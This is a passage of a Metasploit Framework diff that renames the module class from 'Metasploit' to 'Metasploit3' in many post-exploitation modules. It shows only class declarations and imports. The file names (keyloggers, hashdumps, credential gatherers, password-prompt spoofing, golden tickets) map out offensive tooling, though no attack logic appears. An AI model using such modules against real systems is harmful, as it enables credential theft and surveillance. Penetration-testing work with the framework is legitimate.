b/modules/post/multi/manage/dbvis_add_db_admin.rb index 6596146392..eb8d5f1956 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index 3300842d30..ebc9518926 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index 9236b873af..fd93ae6132 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index d772888fcf..b4b18d615c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index a2c14046f3..bce65e61da 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index e940b0c416..c02a0278dc 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index 935c9593d8..bcc5a44ed6 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/post/windows/powershell' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Exploit::Powershell include Post::Windows::Powershell diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index 331a82653d..afa83fcea1 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 9c7bfa2aa4..7042d04d9f 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 4319b3d6d3..823c8b71e4 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb @@ -7,7 +7,7 @@ require 'msf/core' include Msf::Auxiliary::Report -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index 2ff7edc2da..2d11de9201 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index 33eb637fdf..2f7e3c1710 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -5,7 +5,7 @@ require 'shellwords' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/capture/screen.rb b/modules/post/osx/capture/screen.rb index 26d6601c65..02ce7c8cdf 100644 --- a/modules/post/osx/capture/screen.rb +++ b/modules/post/osx/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 92da804bbe..88546475f6 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File # extract/verify by by XORing your kcpassword with your password diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index b7f5648dab..f6b668343a 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index e5373d0a78..3a59f7ae1e 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index dc17dd6bf4..f572a2d64a 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 5eb8454835..27197533b5 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index de77d8cfca..a4fbe15cc5 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::OSX::System include Msf::Exploit::FileDropper diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index 6cd9c32960..fa87e2c46c 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 9f8a6432df..4125e961ac 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index a20b040cc9..1ba4c2be21 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 0772a72847..1763927d2d 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb index 3360b43c0f..4db60b33c1 100644 --- a/modules/post/osx/manage/mount_share.rb +++ b/modules/post/osx/manage/mount_share.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored. FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp) diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb index 387739a1e5..6cf17e92ed 100644 --- a/modules/post/osx/manage/record_mic.rb +++ b/modules/post/osx/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index 26b49c0d4e..cff9656d91 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb index 8869b55597..973e2b24f7 100644 --- a/modules/post/osx/manage/webcam.rb +++ b/modules/post/osx/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index e51582b538..6a8a049fbe 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 0d4c4bb2ee..9f3895a9a2 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index eb561d7841..cdbd17dd57 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index 846d9c0ac0..85e30d43b8 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index a2a08093d9..857ae41b71 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index acc78b2fdb..ba6680db44 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index 475527e9f0..66c0028d56 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index 78dec5c92e..a155bb9166 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb index 715334d9bb..09abdec2b3 100644 --- a/modules/post/windows/escalate/golden_ticket.rb +++ b/modules/post/windows/escalate/golden_ticket.rb @@ -3,7 +3,7 @@ require 'msf/core/post/windows/netapi' require 'msf/core/post/windows/kiwi' require 'msf/core/post/windows/error' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::NetAPI include Msf::Post::Windows::Accounts include Msf::Post::Windows::Kiwi diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index bf2931faaf..928f36fccf 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index 65752a411d..abb3304552 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index 94bf92cb36..ba5abff56d 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 03e1ec0f9a..adfafd3529 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/bitlocker_fvek.rb b/modules/post/windows/gather/bitlocker_fvek.rb index ac65ddfead..03406d82a0 100644 --- a/modules/post/windows/gather/bitlocker_fvek.rb +++ b/modules/post/windows/gather/bitlocker_fvek.rb @@ -1,6 +1,6 @@ require 'rex/parser/fs/bitlocker' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 643ab32e41..f5eebd432c 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index b321ee2c52..51de3c6061 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index a0ca0b7bb6..20c23ca6c3 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index 6fae685c70..b2be541cdb 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index becd26f6a0..e58c2a2020 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index 21569dea6c..a90b6d3ac1 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'metasploit/framework/ntds/parser' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index 34189e1ff7..f1ce358a57 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 342dc73585..3a745ee044 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index 492f11a19e..9a6f9595cc 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 9246cb6f01..8d7e09e1f8 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index def32ecf0f..7abf8eb39a 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns/resolver' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 5d70866e37..4fd3ca037e 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 622dec79c6..efb320bb2d 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index 0476a2dfb8..55c98131a2 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index ccfa27e692..0423d9d277 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index edeb4f9473..ba0bacb968 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' require 'rex/parser/group_policy_preferences' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 13bd95f034..6590172922 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index f1a5358e0f..db8a566a30 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 8ba990f1ea..239eb67dd2 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -10,7 +10,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb index 4e309f6850..87d870ebc4 100644 --- a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb +++ b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 59a6bc4b4a..44364a50e4 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 101255d945..6658d6c797 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -9,7 +9,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index 314b620f0e..f1d00c5d0b 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb +++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -9,7 +9,7 @@ require 'msf/core/auxiliary/report' require 'msf/core/post/windows/mssql' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index 1114540bb9..f42fa10637 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index b01bb07381..bca5db7416 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 627579e05b..9d5d445164 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index 40fc956c13..a01bb9b7b8 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb +++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'openssl' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index 804f8084a8..45f0e8ed0d 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -10,7 +10,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index d054c01da7..f950de44e5 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post 